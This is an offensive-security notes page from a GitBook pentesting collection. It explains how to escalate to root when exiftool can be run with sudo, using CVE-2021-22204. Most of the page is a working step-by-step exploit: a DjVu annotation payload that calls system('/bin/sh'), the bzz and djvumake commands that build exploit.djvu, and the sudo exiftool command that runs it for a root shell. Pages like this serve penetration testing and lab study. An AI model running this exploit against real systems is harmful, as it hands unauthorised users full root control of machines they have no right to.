Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Sudo Exiftool Privilege Escalation

Sudo exiftool command might be vulnerable to privilege escalation (PrivEsc).

Investigation

(root) NOPASSWD: /usr/local/bin/exiftool
Copied!

If we can execute "exiftool" command as root, we can gain access to privileges.

Arbitrary Code Execution (CVE-2021-22204) version 7.44+

Reference: https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/

Check the exiftool version. If the exiftool version is later than 7.44, we can execute arbitrary code.

exiftool -ver
Copied!

Exploitation

In local machine, create the payload in a file named “exploit”.

(metadata "\c${system('/bin/sh')};")
Copied!

Next, compress the file.

bzz exploit exploit.bzz
Copied!

Then create the DjVu file using the compressed file.

sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz
Copied!

Now we have “exploit.djvu” file. Trasfer the file to the target machine and run exiftool as root given the DjVufile.

sudo /usr/local/bin/exiftool exploit.djvu
Copied!

We should get a root shell.

PreviousSudo Dstat Privilege EscalationNextSudo Fail2ban Privilege Escalation

Last updated 1 year ago

  • Investigation
  • Arbitrary Code Execution (CVE-2021-22204) version 7.44+
Page cover image